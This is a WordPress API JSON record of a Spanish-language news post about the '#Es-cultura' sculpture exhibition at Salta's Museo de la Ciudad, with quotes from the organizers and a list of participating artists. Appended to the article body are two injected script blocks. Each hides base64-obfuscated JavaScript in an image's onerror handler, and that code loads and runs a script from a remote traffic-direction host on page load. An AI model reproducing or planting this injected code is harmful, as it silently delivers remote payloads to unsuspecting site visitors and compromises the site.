{"id":1624,"date":"2022-10-17T11:48:04","date_gmt":"2022-10-17T14:48:04","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1624"},"modified":"2025-08-14T00:33:04","modified_gmt":"2025-08-14T03:33:04","slug":"se-inauguro-la-muestra-es-cultura-en-la-ciudad-de-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1624","title":{"rendered":"Se inaugur\u00f3 la muestra \u201c#Es-cultura\u201d en la ciudad de Salta"},"content":{"rendered":"\n<h2 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#a5082f\"><em>La cita fue en el Museo de la Ciudad \u201cCasa de Hern\u00e1ndez\u201d, en La Florida 97.<\/em><\/h2>\n\n\n\n<p>La Municipalidad de Salta inaugur\u00f3 la muestra \u201c#Es-cultura\u201d el s\u00e1bado 15 octubre en el Museo de la Ciudad \u201cCasa de Hern\u00e1ndez\u201d.<\/p>\n\n\n\n<p>Se exponen obras de los alumnos del taller de escultura para adultos de Viviana Ovalle, quienes se capacitaron desde el 2018. Durante el curso extensivo utilizaron t\u00e9cnicas y herramientas variadas para moldear cemento, yeso y resina.<\/p>\n\n\n\n<p>Al respecto, la artista a cargo de los cursos, Viviana Ovalle, coment\u00f3: \u201cEs un taller que pretende trabajar con una mirada hacia el arte desde un punto de vista did\u00e1ctico para que las personas, que no tienen conocimientos previos, se interesen por la escultura y por los temas de la tridimensi\u00f3n, es decir, partiendo de los conocimientos b\u00e1sicos de la disciplina para luego poder aplicarlos en sus creaciones\u201d.<\/p>\n\n\n\n<p>\u201cSi bien es un curso en donde se aprenden t\u00e9cnicas b\u00e1sicas escult\u00f3ricas, lo que se pretende es internalizar todo lo formal y t\u00e9cnico, d\u00e1ndole una carga de sentido conceptual para quien la hace y la ve. Estas t\u00e9cnicas b\u00e1sicas de aprendizaje son necesarias para generar libertad a la hora de crear obras art\u00edsticas\u201d, finaliz\u00f3 Ovalle.<\/p>\n\n\n\n<p>Durante la exposici\u00f3n, los vecinos apreciaron y contemplaron diferentes esculturas, con conocimientos e intenciones diferentes, dependiendo del artista que haya creado dicha obra.<\/p>\n\n\n\n<p>Por su parte, Gracia Mart\u00ednez Arias, directora de Contenidos del Museo de la Ciudad, afirm\u00f3: \u201cRealizar una muestra de esculturas es un gran desaf\u00edo, ya que presenta cierta complejidad en cuanto a la log\u00edstica y montaje. Es por eso que estamos muy contentos de poder llevar adelante esta exposici\u00f3n de m\u00e1s de 60 obras escult\u00f3ricas\u201d.<br>La muestra podr\u00e1 visitarse de martes a domingo y feriados, de 10 a 19, en el Museo de la Ciudad hasta el 9 de noviembre con entrada libre y gratuita.<\/p>\n\n\n\n<p><em><strong>Artistas que participan de la muestra: Iris Yanina Burgos, Macarena Matorras, Aldana Caro Centeno, Jes\u00fas Adam Blas, Ver\u00f3nica Castro, Sonia \u00c1lvarez, M\u00f3nica Villa, Mat\u00edas Bassani, Paola Huidobro, M\u00f3nica Aramayo de Musa, Paula Puca, Virma Sham, Luc\u00eda Montes Casas, Mar\u00eda Rosa C\u00f3rdoba Torrecillas, Ana Mohnblatt, Luc\u00eda Brandan, Adriana Verino, Juana In\u00e9s Cornejo, Mat\u00edas Jovanovics, Carolina Torres, Magal\u00ed S\u00e1nchez, Norma Gonz\u00e1lez, Pino Infante, Rita Romero, Maia Morena fuentes, Noem\u00ed Mor\u00e1n, Samuel Edgardo Gareca, Agustina Salfity, Beatriz Ju\u00e1rez, Claudia Mina, Eulogia Estrada y Flavia Martorell.<br>El listado de artistas se completa con: Ianina Masciarelli, Fabi\u00e1n Cortez, Judith Guti\u00e9rrez, Estela Ortiz, Virginia Martorell, Marisa Gauf\u00edn, Ana Maidana, Francisco L\u00f3pez Fr\u00edas, Jos\u00e9 Manuel Galcer\u00e1n y Jos\u00e9 Ariel Urzagasti Wilde.<\/strong><\/em><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/www.eltribuno.com\/salta\/nota\/2022-10-14-12-11-0-se-inaugurara-la-muestra-es-cultura\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"202\" height=\"46\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/Captura-web_17-10-2022_114047_www.eltribuno.com_.jpeg\" alt=\"\" class=\"wp-image-1625\"\/><\/a><figcaption>Fuente:<\/figcaption><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La cita fue en el Museo de la Ciudad \u201cCasa de Hern\u00e1ndez\u201d, en La Florida 97. La Municipalidad de Salta inaugur\u00f3 la muestra \u201c#Es-cultura\u201d el s\u00e1bado 15 octubre en el Museo de la Ciudad \u201cCasa de Hern\u00e1ndez\u201d. Se exponen obras de los alumnos del taller de escultura para adultos de Viviana Ovalle, quienes se capacitaron [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1626,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[9],"tags":[],"class_list":{"0":"post-1624","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-museos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1624"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1624"}],"version-history":[{"count":5,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1624\/revisions"}],"predecessor-version":[{"id":7316,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1624\/revisions\/7316"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1626"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1624"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1624"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1624"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}